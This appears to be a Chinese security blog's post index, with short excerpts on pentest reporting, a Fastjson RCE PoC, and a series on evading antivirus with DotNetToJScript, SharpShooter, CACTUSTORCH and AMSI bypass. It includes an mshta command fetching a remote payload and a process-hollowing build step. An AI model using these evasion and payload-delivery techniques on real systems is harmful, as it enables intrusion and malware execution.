安服仔必备-漏洞修复建议 一直都想搞个这样的东西,今天刚好看到有个类似的。Web常见漏洞描述及修复建议 这个东西对写渗透测试报告很好用 mark一下,以后对于漏洞修复建议都会更新到这里。 2022-05-27 favourite
Fastjson-rce-xray-poc-编写 1.2.24-rcecd /pentest/target/vulhub-master/fastjson/1.2.24-rce 参考资料 https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce 是什么fastjson是一个java编写的高性能功能非常完善的JSON库,应用范围非常广,在github上star数都超过8k,在 2022-05-27 tools xray
谈谈JM帝国作者被抓事件 首先我身为一个科班的美术生,我从未否认过这个身份、此后也绝不会掩盖这段经历,某天突然看到了蒋明辉画漫画,赚了一百二十万。 我转行到普遍高薪的信息安全行业,尚且没有赚到这么多钱。( 我十七岁高考,十八岁上大一,十九岁读大二,二十岁开始做信息安全的实习,毕业就职于信息安全大厂。严格来说,我并不算转行) 并且本专业(架上艺术、纯手绘技能)实在不好找工作,只能另谋他就。 绘画行业有些神秘、外人可能不了解, 2022-05-22 View
黑客学徒日记-DInvoke Platform invoke托管代码:managed code 托管代码(Managed Code)是在程序运行过程中,由公共语言运行时(Common Language Runtime, CLR)运行的代码。CLR 可以提供诸如垃圾回收、异常处理、类型安全、数组边界等等的检查从而保证代码的安全,所以程序是在受控的环境下运行。 CLR 同时负责提取托管代码,编译成机器代码并执行的功能。典型的托 2022-05-20 evasion
黑客学徒日记-DotNetToJScript与GadgetToJScript DotNetToJScriptC:\Windows\Microsoft.NET\Framework64\v4.0.50727\csc.exe /target:library hollowing.cs DotNetToJScript.exe ExampleAssembly.dll –lang=Jscript –ver=v4,v2 -o runner.js GadgetToJScript在这篇文章中, 2022-05-19 evasion
黑客学徒日记-SharpShooter SharpShooter 神枪手 就是今天要讲的这款工具。 sharp 还可以联想到意味着CSharp这个语言、.net框架 shooter意味着射手、payload发射 在2017年,我们讨论了DotNetToJScript 并且发布了一款工具:CACTUSTORCH 。这个工具是一个poc,并且不免杀,我们不建议在实战中使用。但是这个工具的原理仍然是优秀的,我们重新修改并发布了一款更好的工具 2022-05-17 evasion
黑客学徒日记-windowsDefender自动化bypass Here's something encrypted, password is required to continue reading. 2022-05-16 evasion
cs插件-CACTUSTORCH CACTUSTORCH是payload生成器,可以生成以下这些格式的payload。 VBSVBAJSJSEWSFHTAVBE 使用方法如果不会添加cs插件的可以看看这个视频:CobaltStrike的插件(八) mshta.exe http://192.168.18.30/a amsi bypass插件 总结CACTUSTORCH是一个五年前的工具。 amsi bypass是一个四年前的工 2022-05-13 tools
黑客学徒日记-DotNetToJScript与cs上线 黑客圈和娱乐圈是相反的,在大多数情况下,当你像怪狗一样出名、甚至上了电视的时候,那你的问题就大了。 上一篇中介绍了两个项目,DotNetToJScript 和 UnmanagedPowerShell 让我们能够将.net程序转换为jscript,并且不使用powershell进程就能执行ps命令。 生成DotNetToJScript vba payload在之前的迭代中,当我们生成 JScrip 2022-05-11 tools evasion
黑客学徒日记-DotNetToJScript 在2017年,google项目Zero的研究员James发布了一个很棒的工具DotNetToJScript。如果你不知道,它介绍了一种反射式加载.net程序集的方法,使用了windows原生api例如客户端JScript、VBScript。从攻击者的角度来说,它打开了一个获得代码执行的新的大门,尤其是在受限环境当中。 3年过去了,许多传统杀软厂商能够检测到DotNetToJScirpt的paylo 2022-05-09 tools evasion